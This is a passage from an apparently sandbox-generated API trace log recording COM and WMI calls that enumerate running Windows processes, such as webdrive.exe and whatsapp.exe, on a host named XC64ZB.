[5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.279] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.279] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552ccfc) returned 0x0 [0265.279] IMarshal:GetUnmarshalClass (in: This=0x552ccfc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.279] IUnknown:Release (This=0x552ccfc) returned 0x3 [0265.279] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.279] IUnknown:Release (This=0x552ccf8) returned 0x2 [0265.280] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552ccf8) returned 0x0 [0265.280] IUnknown:AddRef (This=0x552ccf8) returned 0x4 [0265.280] IUnknown:Release (This=0x552ccf8) returned 0x3 [0265.280] IUnknown:Release (This=0x552ccf8) returned 0x2 [0265.280] CoTaskMemFree (pv=0x54ba398) [0265.280] IUnknown:AddRef (This=0x552ccf8) returned 0x3 [0265.280] IWbemClassObject:Get (in: This=0x552ccf8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.280] IWbemClassObject:Get (in: This=0x552ccf8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4108\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.280] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4108\"") returned 0x5e [0265.280] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4108\"") returned 0x5e [0265.280] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.280] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.280] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.280] IUnknown:Release (This=0x601a94) returned 0x1 [0265.281] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.282] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a238) returned 0x0 [0265.282] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a238, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a238) returned 0x0 [0265.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a238, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a238, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.282] WbemDefPath:IUnknown:AddRef (This=0x552a238) returned 0x3 [0265.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a238, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a238, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a238, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5527890) returned 0x0 [0265.283] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5527890, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.283] WbemDefPath:IUnknown:Release (This=0x5527890) returned 0x3 [0265.283] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a238, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.283] WbemDefPath:IUnknown:Release (This=0x552a238) returned 0x2 [0265.283] WbemDefPath:IUnknown:Release (This=0x552a238) returned 0x1 [0265.283] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a238, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a238) returned 0x0 [0265.283] WbemDefPath:IUnknown:AddRef (This=0x552a238) returned 0x3 [0265.283] WbemDefPath:IUnknown:Release (This=0x552a238) returned 0x2 [0265.283] WbemDefPath:IWbemPath:SetText (This=0x552a238, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4108\"") returned 0x0 [0265.283] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.284] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.284] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.284] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.284] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.284] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.284] IWbemClassObject:Get (in: This=0x552ccf8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e0204*=0, plFlavor=0x23e0208*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="webdrive.exe", varVal2=0x0), pType=0x23e0204*=8, plFlavor=0x23e0208*=0) returned 0x0 [0265.284] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0265.284] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0265.284] IWbemClassObject:Get (in: This=0x552ccf8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e0204*=8, plFlavor=0x23e0208*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="webdrive.exe", varVal2=0x0), pType=0x23e0204*=8, plFlavor=0x23e0208*=0) returned 0x0 [0265.284] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0265.284] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0265.284] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.285] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552c500, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.285] IUnknown:QueryInterface (in: This=0x552c500, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552c500) returned 0x0 [0265.285] IUnknown:QueryInterface (in: This=0x552c500, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.285] IUnknown:QueryInterface (in: This=0x552c500, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.286] IUnknown:QueryInterface (in: This=0x552c500, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.286] IUnknown:AddRef (This=0x552c500) returned 0x3 [0265.286] IUnknown:QueryInterface (in: This=0x552c500, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.286] IUnknown:QueryInterface (in: This=0x552c500, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.286] IUnknown:QueryInterface (in: This=0x552c500, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552c504) returned 0x0 [0265.286] IMarshal:GetUnmarshalClass (in: This=0x552c504, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.286] IUnknown:Release (This=0x552c504) returned 0x3 [0265.286] IUnknown:QueryInterface (in: This=0x552c500, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.286] IUnknown:Release (This=0x552c500) returned 0x2 [0265.286] IUnknown:QueryInterface (in: This=0x552c500, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552c500) returned 0x0 [0265.286] IUnknown:AddRef (This=0x552c500) returned 0x4 [0265.286] IUnknown:Release (This=0x552c500) returned 0x3 [0265.287] IUnknown:Release (This=0x552c500) returned 0x2 [0265.287] CoTaskMemFree (pv=0x54ba2d8) [0265.287] IUnknown:AddRef (This=0x552c500) returned 0x3 [0265.287] IWbemClassObject:Get (in: This=0x552c500, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.287] IWbemClassObject:Get (in: This=0x552c500, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4116\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.288] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4116\"") returned 0x5e [0265.288] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4116\"") returned 0x5e [0265.288] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.289] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.289] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.289] IUnknown:Release (This=0x601a94) returned 0x1 [0265.290] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba308) returned 0x0 [0265.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba308, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.290] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba308, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a858) returned 0x0 [0265.290] WbemDefPath:IUnknown:Release (This=0x54ba308) returned 0x0 [0265.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a858, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a858) returned 0x0 [0265.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a858, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a858, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.291] WbemDefPath:IUnknown:AddRef (This=0x552a858) returned 0x3 [0265.291] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a858, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.291] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a858, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.291] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a858, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55279e0) returned 0x0 [0265.292] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55279e0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.292] WbemDefPath:IUnknown:Release (This=0x55279e0) returned 0x3 [0265.292] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a858, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.292] WbemDefPath:IUnknown:Release (This=0x552a858) returned 0x2 [0265.292] WbemDefPath:IUnknown:Release (This=0x552a858) returned 0x1 [0265.292] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a858, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a858) returned 0x0 [0265.292] WbemDefPath:IUnknown:AddRef (This=0x552a858) returned 0x3 [0265.292] WbemDefPath:IUnknown:Release (This=0x552a858) returned 0x2 [0265.292] WbemDefPath:IWbemPath:SetText (This=0x552a858, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4116\"") returned 0x0 [0265.292] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.292] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.292] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.292] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.292] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.292] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.293] IWbemClassObject:Get (in: This=0x552c500, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e0a98*=0, plFlavor=0x23e0a9c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whatsapp.exe", varVal2=0x0), pType=0x23e0a98*=8, plFlavor=0x23e0a9c*=0) returned 0x0 [0265.293] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0265.293] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0265.293] IWbemClassObject:Get (in: This=0x552c500, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e0a98*=8, plFlavor=0x23e0a9c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whatsapp.exe", varVal2=0x0), pType=0x23e0a98*=8, plFlavor=0x23e0a9c*=0) returned 0x0 [0265.293] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0265.293] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0265.293] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.293] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x552c698, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.294] IUnknown:QueryInterface (in: This=0x552c698, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552c698) returned 0x0 [0265.294] IUnknown:QueryInterface (in: This=0x552c698, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.294] IUnknown:QueryInterface (in: This=0x552c698, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, 